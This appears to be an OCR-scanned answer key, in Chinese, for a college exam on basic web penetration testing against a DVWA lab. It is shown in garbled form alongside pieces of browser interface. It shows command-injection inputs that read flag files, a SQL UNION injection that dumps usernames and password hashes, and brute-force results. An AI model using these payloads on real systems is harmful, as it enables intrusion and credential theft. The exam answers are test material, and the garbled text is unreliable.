《web渗透基础B卷答案.docx》由会员分享,可在线阅读,更多相关《web渗透基础B卷答案.docx(9页珍藏版)》请在taowenge.com淘文阁网|工程机械CAD图纸|机械工程制图|CAD装配图下载|SolidWorks_CaTia_CAD_UG_PROE_设计图分享下载上搜索。
1、得分评卷人C1 命 view-source:*最常访问 巴火狐官方站点,新手上路 目常用网址E3京东商城 VOCX IICUU . x MA / Z苏州市职业大学20172018学年第二学期试卷标准答案及评分标准web基础渗透(分散 B卷开卷上机)出卷人 课题组出卷人所在学院(部)计算机工程学院使用班级16网络1一、提交flagl (每题5分,共30分,最多可以提交6个flagl) Password:input type=submit value=Login“ name=Login”)Vulnerability: Command Inj X view-source:0最常访问a火狐官方站点新手
2、上路 目常用网址JD京东商城form name=ping action= # method=postEnter an IP address:input type=submit“ name=Submit value:Submit”) G* Q G* Q view-source:*最常访问包火狐官方站点 新手上路巴常用网址圆京东商城fflagl load_up_file9page! view-source: view-source:京东商城JD*最常访问囱火狐官方站点 新手上路包常用网址User ID:l2/optionXinput type=submit“ name=Submit value=S
3、ubmit”echo ”;else / Login failedsleep( 2 );echo *Username and/or password incorrect. ;mysQl_close();)/flaglbrute_*source view-source:京东商城JD?*最常访问图火狐官方站点安新手上路 H常用网址User ID:2/ optionXopCommand Injection Source*?phpif ( i sset: CS_POST L . Suttomi x J)/ /Get工 nputSrax-sex = S_REQUHST E :ip1 ;/ /SettoXa
4、clclisTSsutlosX i XxxX ions = ax-x-aty (/ /Dev ermi neOS and execute the ping oommarxd. ( sCri st.r s* ), Windlows NT )/WindowsScmd =shell_exeu i.ns * StawrseX ) .Scmd =she工工_exeu、 ixns一 u 4、. S aix-seX/ /K.wdbmuk ozr xhe end txsex*wuho Vpx-e Scmd V/px*e ;)= ta名工 (eKeua&三oux-u e)SQL Injection (Blind
5、) Source 0 )/ Feedback for end user echo User ID exists in ) else (/ Feedback for end userecho -User ID is MISSING / Get resultsSnum = mysql_numrows(: Sresult );if ( Snum 0 )/ Feedback for end user echo User ID exists in ) else (/ Feedback for end userecho -User ID is MISSING Thecharactersuppressese
6、rrorsthe database. from thedatabase, flaglso easy力力/page!);/mvsql_close()得分评卷人得分评卷人二、提交flag2 (每题10分,共20分,最多可以提交2个flag2)1 flag2 brute Vulnerability: Brute ForceLoginLoginLoginWelcome to the password protected area admin ;flag2Ox62727574654O)2、flag hello word!Vulnerability: Command InjectionPing a dev
7、iceEnter an IP address: &;&type flag2.txt: SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply froniReply fromReply fromReply from192.168.190. 131: bytes=32192.168.190. 131: bytes=32192.168.190. 131: bytes=32192. 168. 190. 131: bytes=32TTL=64TTL=64TTL=64TTL=64Ping statistics for 192.168.190
8、. 131:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0msZmxhZ3toZWxsbyB3b3JkIX0=0最常访问 B火狐官方站点 &新手上路围常用网址京东商城flag2:1261734558得分评卷人bytes=32bytes=32bytes=32bytes=32TTL=64TTL=64TTL=64TTL=64三、提交flag3 (每题15分,共30分,最多
9、可以提交2个flag3)1、flag3 DVWAvulnerabmlities)Vulnerability: Command InjectionPing a deviceEnter an IP address: 92.168.190.131&;&type .flag3.txt SubmitPinging 192. 168. 190. 131 with 32 bytes of data:Reply from 192.168.190.131:Reply from 192.168. 190. 131:Reply from 192.168.190.131:Reply from 192.16S.190.
10、 131:Ping statistics for 192.168.190.131:Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), Approximate round trip times in milli-seconds:Minimum = 0ms, Maximum = 0ms, Average = 0msZmxhZzN7RF2XQVx2dR,xuZXJhYmlsaXRpZXN92、 1f手上路围常用网址应京东商城port 180 use SSLresponserawheadershexhtmlrender1337cbr /Surnam
11、e: 8d3533d75ae2c3966d7e0d4fcc69216bID: 1 union select user,password from users First name : pabloSurname: 0dl07d09f5bbe40cade3de5c71e9e9b7ID: 1 imion select user zpassword from users First name : smithySurname: 5f4dcc3b5aa765d61d8327deb882cf99ID: 1 imion select user password from users First name: f
12、lagSurname: flag3:you winMore Information : / secur it earn. com/securityreviews/5DP0HlP76E .html .Wikipedia.org/wiki/SQL_injection : /f erriiJx.mavitiina. com/sql-injection-cheatsheet-oku/v 1 i=1 il II0 matches得分评卷人四、提交flag4 (每题20分,共20分,最多可以提交1个flag4)1、c:flag4.rar 加压密码为“admin” 密文MD5加密,解密为后名为flag4 a
13、dmin 9c:Documents andSettingsDocuments andSettings言藏此驱动器的内容普加/删除程序更索文件或文件夹SoftlnstDownloadsDriverProgram FilesWINDOWSxajnppeula. 1028. txt 文本文档 18 KB和文件夹任务属命名这个文件多动这个文件盘制这个文件辱这个文件发布到Web白电子邮件形式发送此 件月赊这个文件eula. 1033. txt文本文档10 KBeula. 2052. txt文本文档18 KBeula 1036.txt文本文档18 KBeula. 3082. txt 文本文档 18 KBe
14、ula 1040. txt文本文档18 KBeula. 1041. txt文本文档1 KBglobdata. ini 配置设置2 KBinstall. exe External Installer Microsoft Corpor.位置戈的电脑 克的文档 专享文档UI Wrapper Resou.UI Wrapper Resou.YC_RED. MSIWindows Installe. 228 KBinstall. res. 1031.Ressourcen-DLL f.install. res. 1042.UI EHffl己仝上DLLinstall. res. 1033.9 0,21022.8
15、UI Wrapper Rtsou.install. res. 2052.用户界面包装资源install. res. 1036.9.0 21022.8UI Wrapper Resou.install, res. 3082.Archivo DLL de r .UJE E 用凶uPythonzTeula. 1031. txt 文本文档18 KBula. 1042. txt 文本文档 18 KBinstall, ini 配置设置1 KBinstall. rs. 1040.9.0.21022.8 DLL di risorse d.VU RED. cabWinRAR压缩文件 1,409 KBvcredist. bmp96 x 48BMP图像tlagA. rar hnRAR压缩文件 ;KB2、在系统桌面上flag4.rar加压码为“#3a” ,解密后明文为uflag4passwordv感谢您的支持与使用如果内容侵权请联系删除仅供教学交流使用